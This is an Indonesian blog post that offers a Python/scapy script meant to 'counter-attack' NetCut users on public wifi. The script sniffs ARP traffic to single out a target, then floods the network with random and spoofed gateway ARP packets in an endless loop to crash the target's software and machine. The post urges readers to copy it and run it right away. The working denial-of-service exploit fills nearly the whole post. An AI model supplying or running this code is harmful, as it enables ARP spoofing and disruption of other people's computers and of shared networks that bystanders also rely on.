MENYERANG BALIK PENGGUNA NETCUT

· Uncategorized
Penulis

Kesal dengan jaringan internet sering putus saat main internet di warkop atau free wifi akibat ulah pengguna lain yang ingin menang sendiri dengan memutuskan koneksi menggunakan NetCut ? berikut ini script python buatan MayaSeven yang dapat memberi pelajaran untuk mereka-mereka yang sering menggunakan NetCut untuk memutuskan koneksi internet.

Script ini berfungsi menyerang balik pengguna netcut sampai aplikasi tersebut Hang atau crash dan memungkinkan komputer mereka juga hang / not responding, HmemMm,

Terlalu banyak basa-basi nya cepat copy scriptnya dan pasang di Linux kesayangan anda !! nanti keburu di Cut internet anda

Data provided by Pastebin.com – Download Raw – See Original
 
  1. #!/usr/bin/env python  
  2. #Exploit Title: Netcut Denial of Service Vulnerability
  3. #Author: MaYaSeVeN
  4. #PoC: Video  http://www.youtube.com/user/mayaseven
  5. #Version: Netcut 2
  6. #Tested on: Windows Xp, Windows 7
  7. #Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma
  8.  
  9. from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
  10. import commands,os,sys
  11.  
  12. #gw_mac = commands.getoutput(“arp -i %s | grep %s” % (conf.iface,conf.iface)).split()[2]
  13. gw_ip  = commands.getoutput(“ip route list | grep default”).split()[2]
  14.      
  15. def protect(gw_ip,gw_mac):
  16.     os.popen(“arp -s %s %s” %(gw_ip,gw_mac))
  17.     print “Protected himself”
  18.      
  19. def detect():
  20.         ans = sniff(filter=’arp’,timeout=7)
  21.         target=[]
  22.         for r in ans.res:
  23.             target.append(r.sprintf(“%ARP.pdst% %ARP.hwsrc% %ARP.psrc%”))
  24.         return target
  25.  
  26. def preattack(gw_ip):
  27.     num = []
  28.     count = 0
  29.     target = 0
  30.     temp = 0
  31.     print “Detecting…”
  32.     d = detect()
  33.     for i in range(len(d)):
  34.         if d[i].split()[0] == “255.255.255.255”:
  35.             num.append(d.count(d[i]))
  36.             if d.count(d[i]) > count:
  37.                 count = d.count(d[i])
  38.                 target = i
  39.         if d[i].split()[0] == gw_ip:
  40.             temp += 1      
  41.     if len(d) < 7:
  42.         print “[-] No one use Netcut or try again”
  43.         exit()
  44.     if len(num)*7 < temp:
  45.         num[:] = []
  46.         count = 0
  47.         result = float(temp)/len(d)*100
  48.         for j in range(len(d)):
  49.             if d[i].split()[0] == gw_ip:
  50.                 num.append(d.count(d[j]))
  51.                 if d.count(d[i]) > count:
  52.                     count = d.count(d[i])
  53.                     target = i
  54.             num.reverse()
  55.             result = float(temp)/len(d)*100
  56.         print target
  57.     else:
  58.         num.reverse()
  59.         result = float(num[0]+temp)/len(d)*100
  60.      
  61.     print “There is a possibility that ” + str(result) + “%”
  62.     if result>= 50:
  63.         target_mac = d[target].split()[1]
  64.         target_ip = d[target].split()[2]
  65.         print “[+]Detected, Netcut using by IP %s MAC %s” %(target_ip,target_mac)
  66.         attack(target_mac,target_ip,gw_ip)  
  67.     else:
  68.         print “[-] No one use Netcut or try again”
  69.  
  70. def attack(target_mac,target_ip,gw_ip):
  71.     print “[+]Counter Attack !!!”
  72.     e = Ether(dst=”FF:FF:FF:FF:FF:FF”)
  73.     while 1:
  74.         a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
  75.         p = e/a/Padding(“\x00″*18)
  76.         sendp(p,verbose=0)
  77.         a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
  78.         p1 = e/a1/Padding(“\x00″*18)
  79.         sendp(p1,verbose=0)
  80.          
  81. if __name__ == ‘__main__’:
  82.     os.system(“clear”)
  83.     print   “###################################################”
  84.     print    ” __  __    __     __    _____   __      __  _   _”
  85.     print    “|  \/  |   \ \  / /   / ____|  \ \   / / | \ | |”
  86.     print    “| \ / | __ \ \_/ /_ _| (___   __\ \ / /__|  \| |”
  87.     print    “| |\/| |/ _\ \  / _\ |\___ \ / _ \ \/ / _ \ . \ |”
  88.     print    “| |  | | (_| || | (_| |____) |  __/\ /  __/ |\ |”
  89.     print    “|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|”
  90.     print   ” “
  91.     print   “###################################################”
  92.     print   “”
  93.     print   “”
  94.     if len(sys.argv) == 2 or len(sys.argv) == 3:
  95.         if len(sys.argv) == 2:
  96.             conf.iface=sys.argv[1]
  97.             preattack(gw_ip)
  98.         if len(sys.argv) == 3:
  99.             conf.iface=sys.argv[1]
  100.             gw_mac = sys.argv[2]
  101.             protect(gw_ip,gw_mac)
  102.             preattack(gw_ip)
  103.     else:
  104.         print ”’Mode:  
  105. 1.)Attack only
  106. Usage: NetcutKiller <Interface>
  107. e.g. NetcutKiller.py wlan0
  108.        
  109. 2.)Attack with protect himself
  110. Usage: NetcutKiller <Interface> <MAC_Gateway>
  111. e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
  112. ”’
Menyerang balik Pengguna Netcut 9 out of 10 based on 10 ratings. 9 user reviews.

Sumber : http://www.umboh.net/

1 Komentar

Comments RSS
  1. yucan

    klo di mikrotik scriptnya gimana yach..? tolg dong..

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: